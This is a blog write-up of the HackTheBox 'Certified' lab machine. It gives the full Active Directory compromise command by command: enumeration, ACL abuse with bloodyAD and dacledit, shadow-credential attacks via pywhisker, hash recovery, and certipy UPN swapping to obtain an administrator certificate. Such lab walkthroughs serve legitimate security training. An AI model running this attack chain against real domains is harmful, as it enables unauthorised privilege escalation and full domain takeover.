Certified
xone 1 month ago

Certified HTB Writeup | HacktheBox

Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!

Initial Scenario

We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:


Username: judith.mader

Password: judith09

User Account: judith.mader (Low privilege)

Target: Escalate privileges to root on the machine.

Tools Utilized: nxc, bloodyAD, dacledit.py, pywhisker, Impacket scripts, and certipy.

Enumeration

Nmap Scan

An initial Nmap scan revealed several open ports on the domain controller (DC01):

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP over SSL
3268/tcp  open  ldap          Microsoft Global Catalog
3269/tcp  open  ssl/ldap      Microsoft Global Catalog over SSL
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing


Key observations:


Active Directory Indicators: Ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) suggest the presence of a Windows domain controller.

SSL Certificates: The certificate details revealed the hostname DC01.certified.htb and additional domain information, confirming the target's role as a certificate authority.

SMB Signing: Nmap scripts indicated SMB signing is enabled and required, which may limit some SMB attack vectors.

Testing SMB Login

With the obtained credentials, SMB authentication was tested using nxc:

nxc smb $IP -u 'judith.mader' -p 'judith09'

Output:

SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09

The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.

LDAP Enumeration with BloodHound

To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:

nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41

Output:

LDAP        10.10.11.41     389    DC01             [+] certified.htb\judith.mader:judith09
LDAP        10.10.11.41     389    DC01             Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group
LDAP        10.10.11.41     389    DC01             Done in 00M 33S
LDAP        10.10.11.41     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip

The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.

BloodHound Analysis

The BloodHound graph revealed several key attack paths within the Active Directory environment:

Certified  BloodHound graph
  1. Judith Mader's Permissions:
  2. Judith Mader has WriteOwner permissions on the Management group.
  3. Service Account (Management_SVC):
  4. The Management_SVC account has GenericWrite permissions over the Management group.
  5. CA_Operator Privilege:
  6. The Management_SVC account has GenericAll permissions over the CA_Operator user.

User Privilege Escalation

1. Data Collection with nxc

  • Action: Enumerated Active Directory data and found that judith.mader could modify the “Management” group.
  • Details: Used BloodHound to analyze the data collected by nxc.
2. Setting Ownership

Used bloodyAD to set judith.mader as the owner of the “Management” group:

bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
3. Granting Write Permissions

Updated the group permissions with dacledit.py:

python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'

4. Adding to Management Group

Added judith.mader to the “Management” group:

bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
5. Exploiting KeyCredentialLink

Used pywhisker to create a certificate for management_svc:

python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
6. Obtaining a TGT

Generated a Kerberos TGT for management_svc:

python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache
7. Recovering NT Hash

Extracted NT hash for management_svc using gettgtpkinit.py:

python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX

8. Logging in with Evil-WinRM

Logged in as management_svc with Evil-WinRM:

evil-winrm -i $IP -u management_svc -H $NT-Hash #Use NT Hash 

Root Privilege Escalation

1. Identifying GenericAll Rights

Discovered that management_svc had GenericAll rights over ca_operator.

2. Adding KeyCredential

Used certipy-ad to modify ca_operator KeyCredential:

certipy-ad shadow auto -u [email protected] -hashes $NT-Hash -account ca_operator
3. Updating UPN of ca_operator

Updated the UPN (UserPrincipalName) of ca_operator to administrator:

certipy-ad account update -u [email protected] -hashes $NT-Hash -user ca_operator  -upn administrator
4. Requesting Administrator Certificate

Requested a certificate for the administrator account using certipy-ad:

certipy-ad req -username [email protected] -hashes $NT-Hash -ca certified-DC01-CA -template CertifiedAuthentication


5. Restoring Original UPN

Restored ca_operator’s UPN to its original value:

certipy-ad account update -u [email protected] -hashes $NT-Hash -user ca_operator  -upn [email protected]

6. Obtaining Administrator TGT

Authenticated as administrator with the new certificate:

certipy-ad auth -pfx administrator.pfx -domain certified.htb

7. Logging in as Administrator

Logged in with Evil-WinRM as administrator:

evil-winrm -u administrator -H $NT-Hash-1 -i $IP

Summary
  1. Key Steps:
  • Abused AD misconfigurations to escalate privileges.
  • Exploited certificate services to gain access to the administrator account.


Result: Full compromise of the Certified machine.

1
3.3K
Web Fundamentals: Understanding the Core Building Blocks of the Internet

Web Fundamentals: Understanding the Core Building Blocks of the Intern...

defaultuser.png
X0NE
1 year ago
Awkward HTB Writeup | HacktheBox

Awkward HTB Writeup | HacktheBox

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
10 months ago
Understanding API Authentication: A Guide to Cookie-Based,jwt

Understanding API Authentication: A Guide to Cookie-Based,jwt

defaultuser.png
X0NE
1 year ago
A very comprehensive penetration testing memo

A very comprehensive penetration testing memo

defaultuser.png
lazyhacker
1 year ago
Cyber Security Useful Links

Cyber Security Useful Links

defaultuser.png
lazyhacker
1 year ago